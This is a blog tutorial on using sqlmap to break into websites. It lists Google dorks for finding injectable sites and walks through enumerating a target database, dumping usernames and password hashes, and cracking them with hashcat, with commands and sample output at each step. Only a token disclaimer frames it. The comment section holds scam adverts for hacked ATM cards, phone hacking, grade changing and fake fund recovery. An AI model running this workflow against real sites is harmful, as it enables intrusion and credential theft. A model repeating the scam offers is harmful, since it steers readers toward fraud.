How To Hack Website Using Sqlmap In Kali Linux - HacCoders

Saturday, 23 January 2016

How To Hack Website Using Sqlmap In Kali Linux

how to hack website using sqlmap

Hi Friends Today I Will Explain Sqlmap Techniques For Hack Website But First You Know What Is Sqlmap..
So Lets Start Basic Of Sqlmap..

What is SQLMAP

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Step 1: Find a Vulnerable Website


This is usually the toughest bit and takes longer than any other steps. Those who know how to use Google Dorks knows this already, but in case you don’t I have put together a number of strings that you can search in Google. Just copy paste any of the lines in Google and Google will show you a number of search results.

Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website

This list a really long.. Took me a long time to collect them. If you know SQL, then you can add more here.. Put them in comment section and I will add them here.

Google Dork string Column 1

Google Dork string Column 2

Google Dork string Column 3
inurl:item_id=
inurl:review.php?id=
inurl:hosting_info.php?id=
inurl:newsid=
inurl:iniziativa.php?in=
inurl:gallery.php?id=
inurl:trainers.php?id=
inurl:curriculum.php?id=
inurl:rub.php?idr=
inurl:news-full.php?id=
inurl:labels.php?id=
inurl:view_faq.php?id=
inurl:news_display.php?getid=
inurl:story.php?id=
inurl:artikelinfo.php?id=
inurl:index2.php?option=
inurl:look.php?ID=
inurl:detail.php?ID=
inurl:readnews.php?id=
inurl:newsone.php?id=
inurl:index.php?=
inurl:top10.php?cat=
inurl:aboutbook.php?id=
inurl:profile_view.php?id=
inurl:newsone.php?id=
inurl:material.php?id=
inurl:category.php?id=
inurl:event.php?id=
inurl:opinions.php?id=
inurl:publications.php?id=
inurl:product-item.php?id=
inurl:announce.php?id=
inurl:fellows.php?id=
inurl:sql.php?id=
inurl:rub.php?idr=
inurl:downloads_info.php?id=
inurl:index.php?catid=
inurl:galeri_info.php?l=
inurl:prod_info.php?id=
inurl:news.php?catid=
inurl:tekst.php?idt=
inurl:shop.php?do=part&id=
inurl:index.php?id=
inurl:newscat.php?id=
inurl:productinfo.php?id=
inurl:news.php?id=
inurl:newsticker_info.php?idn=
inurl:collectionitem.php?id=
inurl:index.php?id=
inurl:rubrika.php?idr=
inurl:band_info.php?id=
inurl:trainers.php?id=
inurl:rubp.php?idr=
inurl:product.php?id=
inurl:buy.php?category=
inurl:offer.php?idf=
inurl:releases.php?id=
inurl:article.php?ID=
inurl:art.php?idm=
inurl:ray.php?id=
inurl:play_old.php?id=
inurl:title.php?id=
inurl:produit.php?id=
inurl:declaration_more.php?decl_id=
inurl:news_view.php?id=
inurl:pop.php?id=
inurl:pageid=
inurl:select_biblio.php?id=
inurl:shopping.php?id=
inurl:games.php?id=
inurl:humor.php?id=
inurl:productdetail.php?id=
inurl:page.php?file=
inurl:aboutbook.php?id=
inurl:post.php?id=
inurl:newsDetail.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:viewshowdetail.php?id=
inurl:gallery.php?id=
inurl:fiche_spectacle.php?id=
inurl:clubpage.php?id=
inurl:article.php?id=
inurl:communique_detail.php?id=
inurl:memberInfo.php?id=
inurl:show.php?id=
inurl:sem.php3?id=
inurl:section.php?id=
inurl:staff_id=
inurl:kategorie.php4?id=
inurl:theme.php?id=
inurl:newsitem.php?num=
inurl:news.php?id=
inurl:page.php?id=
inurl:readnews.php?id=
inurl:index.php?id=
inurl:shredder-categories.php?id=
inurl:top10.php?cat=
inurl:faq2.php?id=
inurl:tradeCategory.php?id=
inurl:historialeer.php?num=
inurl:show_an.php?id=
inurl:product_ranges_view.php?ID=
inurl:reagir.php?num=
inurl:preview.php?id=
inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num=
inurl:loadpsb.php?id=
inurl:transcript.php?id=
inurl:forum_bds.php?num=
inurl:opinions.php?id=
inurl:channel_id=
inurl:game.php?id=
inurl:spr.php?id=
inurl:aboutbook.php?id=
inurl:view_product.php?id=
inurl:pages.php?id=
inurl:preview.php?id=
inurl:newsone.php?id=
inurl:announce.php?id=
inurl:loadpsb.php?id=
inurl:sw_comment.php?id=
inurl:clanek.php4?id=
inurl:pages.php?id=
inurl:news.php?id=
inurl:participant.php?id=

inurl:avd_start.php?avd=
inurl:download.php?id=

inurl:event.php?id=
inurl:main.php?id=

inurl:product-item.php?id=
inurl:review.php?id=

inurl:sql.php?id=
inurl:chappies.php?id=

inurl:material.php?id=
inurl:read.php?id=

inurl:clanek.php4?id=
inurl:prod_detail.php?id=

inurl:announce.php?id=
inurl:viewphoto.php?id=

inurl:chappies.php?id=
inurl:article.php?id=

inurl:read.php?id=
inurl:person.php?id=

inurl:viewapp.php?id=
inurl:productinfo.php?id=

inurl:viewphoto.php?id=
inurl:showimg.php?id=

inurl:rub.php?idr=
inurl:view.php?id=

inurl:galeri_info.php?l=
inurl:website.php?id=

 

Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection


For every string show above, you will get huundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection. There’s multiple ways and I am sure people would argue which one is best but to me the following is the simplest and most conclusive.

Let’s say you searched using this string inurl:item_id= and one of the search result shows a website like this:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15

Just add a single mark ' at the end of the URL. (Just to ensure, " is a double mark and ' is a single  mark).

So now your URL will become like this:
 
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'

If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirect you to a different page, move on to the next site in your Google search results page.

See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons.

how to hack website using sqlmap

Examples of SQLi Errors from Different Databases and Languages

Microsoft SQL Server

Server Error in ‘/’ Application. Unclosed  mark before the character string ‘attack;’.

Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Unclosed  mark before the character string ‘attack;’.

 

MySQL Errors


Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12


Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 12

 

Oracle Errors


java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at 
oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated

PostgreSQL Errors


Query failed: ERROR: unterminated quoted string at or near “‘’’”

 

Step 2: List DBMS databases using SQLMAP SQL Injection


As you can see from the screenshot above, I’ve found a SQLMAP SQL Injection vulnerable website. Now I need to list all the databases in that Vulnerable database. (this is also called enumerating number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable.

Run the following command on your vulnerable website with.

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs

In here:

sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”)
--dbs = Enumerate DBMS databases

See screenshot below.

how to hack website using sqlmap
This commands reveals quite a few interesting info:


web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'

So, we now have two database that we can look into. information_schema is a standard database for almost every MYSQL database. So our interest would be on sqldummywebsite database.

Step 3: List tables of target database using SQLMAP SQL Injection

Now we need to know how many tables this sqldummywebsite database got and what are their names. To find out that information, use the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables

Sweet, this database got 8 tables.
 
[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info

how to hack website using sqlmap

and of course we want to check whats inside user_info table using SQLMAP SQL Injection as that table probably contains username and passwords.

Step 4: List columns on target table of selected database using SQLMAP SQL Injection

Now we need to list all the columns on target table user_info of sqldummywebsite database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:


sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns

This returns 5 entries from target table user_info of sqldummywebsite database.

 
[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)

AHA! This is exactly what we are looking for … target table user_login and user_password .



how to hack website using sqlmap



Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection

SQLMAP SQL Injection makes is Easy! Just run the following command again:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump

Guess what, we now have the username from the database:
 
[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes


how to hack website using sqlmap

Almost there, we now only need the password to for this user.. Next shows just that..



Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection

You’re probably getting used to on how to use SQLMAP SQL Injection tool. Use the following command to extract password for the user.

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump

TADA!! We have password.
 
[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+

how to hack website using sqlmap

But hang on, this password looks funny. This can’t be someone’s password.. Someone who leaves their website vulnerable like that just can’t have a password like that.
That is exactly right. This is a hashed password. What that means, the password is encrypted and now we need to decrypt it.

Step 7: Cracking password

So the hashed password is 24iYBc17xK0e. . How do you know what type of hash is that?

Step 7.a: Identify Hash type

Luckily, Kali Linux provides a nice tool and we can use that to identify which type of hash is this. In command line type in the following command and on prompt paste the hash value:

hash-identifier

how to hack website using sqlmap

Excellent. So this is DES(Unix) hash.

Step 7.b: Crack HASH using cudahashcat

First of all I need to know which code to use for DES hashes. So let’s check that:

cudahashcat --help | grep DES

how to hack website using sqlmap

So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500.

I am running a Computer thats got NVIDIA Graphics card. That means I will be using cudaHashcat. On my laptop, I got an AMD ATI Graphics cards, so I will be using oclHashcat on my laptop.

If you’re on VirtualBox or VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali in either a persisitent USB or in Hard Disk. Instructions are in the website, search around.

I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running:

cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt
  
how to hack website using sqlmap

Interesting find: Usuaul Hashcat was unable to determine the code for DES hash. (not in it’s help menu).

Howeverm both cudaHashcat and oclHashcat found and cracked the key.

Anyhow, so here’s the cracked password: abc123. 24iYBc17xK0e.:abc123

So We Have Successfully Hack The Website...

NOTE: This Is Only For Educational Purpose. I Will Not Be Responsible For Anything Done By You.


9 comments:

  1. My ex ruined me broke due to his incessant extravagant spending , I found myself in a big mess. I talked to a loan company and I was told that they can't lend me loan . I was devastated, that's put me into a lot of debt. I looked online and came across Mr Oscar White of oscarwhitehackersworld@gmail.com , I hit him up and to my greatest surprise, my debt was paid in 4 working days from Oscar White blank atm card which i used to withdraw money untraceable and shop online with the blank atm card . I was so amazed and it didn't cost me too much to get the card and today have made up to $50,000.I implore you to contact him on how to get yours and because rich like me @ oscarwhitehackersworld@gmail.com or whats-app +1(323)-362-2310.No doubt he's the best out there and your problems will be solved!

    ReplyDelete
  2. Haven't you heard about cyber hacking company blank ATM card and how other people had benefited from it? I am Williams vivian by name, i want to share a blog and forums on how to get real blank ATM card,thank to cyber hacking company who helped me with an already hacked ATM CARD and i was so poor without funds that i got frustrated. One morning as i was browsing on the internet, i saw different comments of people testifying of how cyber hacking company helped him from being poor to a rich man through this already hacked ATM CARD. I was skeptical if this was true, i decided to contact him to know if he is real he proved to me beyond all doubts that its was really for real so i urgently receive my blank ATM card. Contact his email cyberhackingcompany@gmail.com and today am also testifying on how cyber hacking company helped me. I never believed in it until the card was sent to me, which am using today Contact the company now and become rich. Email: cyberhackingcompany@gmail.com 

    ReplyDelete
  3. Welcome. BE NOT TROUBLED anymore. you’re at the right place. Nothing like having trustworthy hackers. have you lost money before or bitcoins and are looking for a hacker to get your money back? You should contact us right away. It's very affordable and we give guarantees to our clients. Our hacking services are as follows:Email:Creditcards.atm@gmail.com 
    -hack into any kind of phone
    _Increase Credit Scores
    _western union, bitcoin and money gram hacking
    _criminal records deletion_BLANK ATM/CREDIT CARDS
    _Hacking of phones(that of your spouse, boss, friends, and see whatever is being discussed behind your back)
    _Security system hacking...and so much more. Contact THEM now and get whatever you want at
    Email:Creditcards.atm@gmail.com 

      Whats app:+1(305) 330-3282  

    WHY WOULD YOU NEED TO HIRE A HACKER??:
    There are so many Reasons why people need to hire a hacker, It might be to Hack a Websites to deface information, retrieve information, edit information or give you admin access.
    • Some people might need us To Hack Their Target Smartphone so that they could get access to all activities on the phone like , text messages , call logs , Social media Apps and other information
    • Some might need to Hack a Facebook , gmail, Instagram , twitter and other social media Accounts,
    • Also Some Individuals might want to Track someone else's Location probably for investigation cases
    • Some might need Us to Hack into Court's Database to Clear criminal records.
    • However, Some People Might Have Lost So Much Funds With BINARY OPTIONS BROKERS or BTC MINING and wish to Recover Their Funds
    • All these Are what we can get Done Asap With The Help Of Our Root Hack Tools, Special Hack Tools and Our Technical Hacking Strategies Which Surpasses All Other Hackers.

    ★ OUR SPECIAL SERVICES WE OFFER ARE:
    * RECOVERY OF LOST FUNDS ON BINARY OPTIONS
    * Credit Cards Loading ( USA Only )
    * BANK Account Loading (USA Banks Only)

    ★ You can also contact us for other Cyber Attacks And Hijackings, we do All ★

    ★ CONTACTS:
    * For Binary Options Recovery,feel free to contact (Creditcards.atm@gmail.com)for a wonderful job well done,stay safe.

    Why waste your time waiting for a monthly salary. When you can make up to $3,000 in 5-7days from home,                     
    Invest $300 and earn $3,000
    Invest $500 and earn $5,000
    Invest $600 and earn $6,000
    Invest $700 and earn $7,000
    Invest $800 and earn $8,000
    Invest $900 and earn $9,000
    Invest $1000 and earn $10,000

    IT HAS BEEN TESTED AND TRUSTED  

    ReplyDelete
  4. Are you desperately in need of a hacker in any area of your life??? then you can contact; ( www.hackintechnology.com services like; -hack into your cheating partner's phone(whatsapp,bbm.gmail,icloud,facebook, twitter,snap chat and others) -Sales of Blank ATM cards. -hack into email accounts and trace email location -all social media accounts, -school database to clear or change grades, -Retrieval of lost file/documents -DUIs -company records and systems, -Bank accounts,Paypal accounts -Credit cards hacker -Credit score hack -Monitor any phone and email address -Websites hacking, pentesting. -IP addresses and people tracking. -Hacking courses and classes CONTACT THEM= hackintechnologyatgmaildotcom or whatsapp +12132951376 their services are the best on the market and 100% security and discreet work is guarante

    ReplyDelete

  5. Cool way to have financial freedom!!! Are you tired of living a poor life, here is the opportunity you have been waiting for. Get the new ATM BLANK CARD that can hack any ATM MACHINE and withdraw money from any account. You do not require anybody’s account number before you can use it. Although you and I knows that its illegal,there is no risk using it. It has SPECIAL FEATURES, that makes the machine unable to detect this very card,and its transaction can’t be traced .You can use it anywhere in the world. With this card,you can withdraw nothing less than $4,500 a day. So to get the card,reach the hackers via email address : besthackersworld58@gmail.com or whatsapp him on +1(323)-723-2568

    ReplyDelete
  6. CONTACT: onlineghosthacker247 @gmail. com
    -Find Out If Your Husband/Wife or Boyfriend/Girlfriend Is Cheating On You
    -Let them Help You Hack Any Website Or Database
    -Hack Into Any University Portal; To Change Your Grades Or Upgrade Any Personal Information/Examination Questions
    -Hack Email; Mobile Phones; Whatsapp; Text Messages; Call Logs; Facebook And Other Social Media Accounts
    -And All Related Services
    - let them help you in recovery any lost fund scam from you
    onlineghosthacker Will Get The Job Done For You
    onlineghosthacker247 @gmail. com
    TESTED AND TRUSTED!

    ReplyDelete


  7. If you ever want to change or up your university grades contact cybergolden hacker he'll get it done and show a proof of work done before payment. He's efficient, reliable and affordable. He can also perform all sorts of hacks including text, whatsapp, password decrypt,hack any mobile phone, Escape Bancruptcy, Delete Criminal Records and the rest

    Email: cybergoldenhacker at gmail dot com

    ReplyDelete
  8. IS IT POSSIBLE TO ACTUALLY GET BACK FUNDS LOST TO CRYPTOCURRENCY SCAM? ABSOLUTELY YES! BUT, YOU MUST CONTACT THE RIGHT AGENCY TO ACHIEVE THIS.

    DARK WEB ONLINE HACKERS is a financial regulator, private investigation and funds recovery body. We specialize in cases concerning cryptocurrency, FAKE investment schemes and recovery scam.

    Visit darkwebonlinehackers.com now to report your case or contact our support team via the contact information below to get started.

    dwchzone@gmail.com

    WhatsApp: +1 (803) 392-1735

    Stay Safe !

    ReplyDelete